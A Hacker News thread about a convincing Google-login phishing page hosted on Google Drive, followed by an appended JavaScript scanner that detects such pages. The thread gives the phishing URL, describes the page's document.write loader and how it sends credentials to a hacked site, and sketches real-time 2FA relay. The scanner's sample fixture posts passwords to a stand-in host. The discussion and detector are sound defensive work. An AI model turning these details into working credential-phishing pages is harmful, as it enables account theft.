

Someone Mailed Me an Amazing Phishing Page of Google Login - h43k3r

https://googledrive.com/host/0B8XF8k7djaD0b1JtU2lpTzBnWUE/

DON'T ENTER YOUR CREDENTIALS ON THE ABOVE PAGE. It is a SPAM page which I got from one of my friends.

The above link is a great example of how even informed people can get into phishing traps. It has HTTPS and looks exactly like Google Login.

This supports my theory that everyone should enable 2 factor authentication.

EDIT - Check out its source, the whole page is generated using JS (I am not sure of this claim).

EDIT2 - I have reported it to Google as a phishing page. I am adding a screenshot for the future in case Google takes it down somehow. Link - http://imgur.com/sTY1uRP

EDIT3 - It will send spam to all the emails in your contact book using your Gmail id. Tried it with a dummy account.
======
smt88
Unfortunately, some idiotic companies actually do use non-standard domain
names.

For example, my Citi credit card uses "accountonline.com" as the login page.
With things like that, "googledrive.com" seems less suspicious.

So to anyone building for the web: please use a single, canonical domain name!

~~~
0942v8653
[https://googledrive.com](https://googledrive.com) _is_ Google! It's hosted
with Google drive (like dropbox can do). So this is one case where it would
pay not to use the same domain, actually.

Edit: Also important because that way password autofill won't automatically
fill in your details.

~~~
smt88
That's a major security flaw.

On the plus side, looks like your report worked. As of a few minutes after you
posted, the link says it's a phishing scam.

~~~
vxNsr
Actually that's a feature: now anyone can host a simple webpage without any
hassle. The fact that this dude figured out a way around it is kinda cool, but
I'd rather they not remove this because of phishing attacks.

On the other hand I can see how THIS specific attack is very dangerous: people
might assume that they need to login to google to see the content hosted by
google....

------
vxNsr
I very nearly entered my creds just by instinct; it looks truly legit. Just so
you know, now Chrome stops you from going there (you need to admit to being an
idiot before you can move forward).

------
0942v8653
I tried to submit the form but Safari warned me that it wasn't being submitted
securely. I wonder if they use JS to detect what you're typing in before it's
submitted.

~~~
dbansal
Of course it's possible to capture a user's screen as soon as they visit a page.
Check mouseflow or gamooga secondscreen.

------
mod
Re: 2-factor auth:

Couldn't the app try to login, detect the 2-factor, and ask you for that in
the response?

~~~
Someone1234
Yes it could.

However it would only have 60 seconds (30 + 30 sec) to forward that to Google
along with your credentials. It cannot be done via the user's browser due to
forgery protection on Google's end, so a third party piece of software would
have to grab the credentials including 2f code and log in using a "browser"
(e.g. WebKit engine).

One challenging problem is for the site to know if it should prompt you for
the 2f code. It won't know until it tries to login, and it won't be able to
try and login until it forwards your credentials to a third party piece of
software and then gets a reply back. Even assuming this is done very fast, it
could still take a few seconds, in particular if Google starts to throttle
their client's IP.

It would likely be easier just to target low hanging fruit (i.e. non-2F
people) unless this is a targeted attack.

------
harshil93
Holy Shit. It looks damn original.

------
n-gauge
The only giveaway is the '));' characters in the bottom left of the screen.

~~~
h43k3r
I totally missed that because of my screen resolution. I need to scroll to see
that.

------
shiftpgdn
Goodness I'd have even gotten busted by that. That's quite clever.

------
h43k3r
I would love to know the technical details behind the creation of this page.

~~~
slipstream-
It's just a webpage hosted on Google Drive:

[https://support.google.com/drive/answer/2881970?hl=en](https://support.google.com/drive/answer/2881970?hl=en)

Regarding the contents of the page itself:

The first layer of obfuscation document.write's a script tag to include "aa.js",
which document.write's the main phishing page itself, which sends the contents
directly to a hacked WordPress site ( cairngormsagainstpylons dot org ).

Reported via Google Drive abuse as a phishing page.
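As an added example that is not part of this thread, here is a small static scanner for the two traits slipstream- describes: a document.write() call that injects a script tag, and a credential form whose action posts off-origin (and over plain HTTP, which is what triggers the Safari warning mentioned above). The HTML, file id and hostnames are constructed samples, not the real page.

```javascript
// Heuristic scanner for the phishing-page traits described in the thread.
// Works on the raw HTML string, so it runs without a browser DOM.

// document.write(...) whose argument contains a <script src=...> tag. The
// argument capture stops at the first ')', which handles the one-line
// injection stubs obfuscators emit, not arbitrary JavaScript.
const WRITE_CALL_RE = /document\.write\s*\(([^)]*)\)/gi;
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*\\?["']?([^"'\\\s>]+)/i;
// <form action=...> and an <input type="password"> anywhere on the page.
const FORM_RE = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi;
const PASSWORD_RE = /<input\b[^>]*\btype\s*=\s*["']?password/i;

function scanPhishingTraits(html, pageUrl) {
  const page = new URL(pageUrl);
  const findings = [];
  let m;

  while ((m = WRITE_CALL_RE.exec(html)) !== null) {
    const src = SCRIPT_SRC_RE.exec(m[1]);
    if (src) findings.push({ kind: 'script-via-document.write', target: src[1] });
  }

  const hasPassword = PASSWORD_RE.test(html);
  while ((m = FORM_RE.exec(html)) !== null) {
    let action;
    try { action = new URL(m[1], page); } catch { continue; }
    // Credentials leaving the hosting origin is the core phishing signal.
    if (action.origin !== page.origin) {
      findings.push({ kind: 'form-posts-off-origin', target: action.origin, credentials: hasPassword });
    }
    // HTTPS page posting to an http: action is the mixed-content submit browsers warn about.
    if (page.protocol === 'https:' && action.protocol === 'http:') {
      findings.push({ kind: 'form-posts-over-http', target: action.href, credentials: hasPassword });
    }
  }
  return findings;
}

// Constructed sample: a Drive-hosted page with the document.write -> aa.js
// chain and a login form posting to a (fictional) compromised blog.
const SAMPLE_PAGE_URL = 'https://googledrive.com/host/EXAMPLE-FILE-ID/';
const SAMPLE_HTML = `
<html><body>
<script>document.write('<script src="aa.js"><\\/script>');</script>
<form action="http://hacked-blog.example/wp-content/post.php" method="post">
  <input name="Email"><input type="password" name="Passwd">
</form>
</body></html>`;
// Constructed benign control: same-origin HTTPS login form, no injection.
const BENIGN_HTML = '<form action="/login" method="post"><input type="password" name="p"></form>';
```

Run `scanPhishingTraits(SAMPLE_HTML, SAMPLE_PAGE_URL)` to get three findings (injected script, off-origin post, plain-HTTP post), and the benign control yields none.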

------
benshyong
Wow, this is ridiculous.

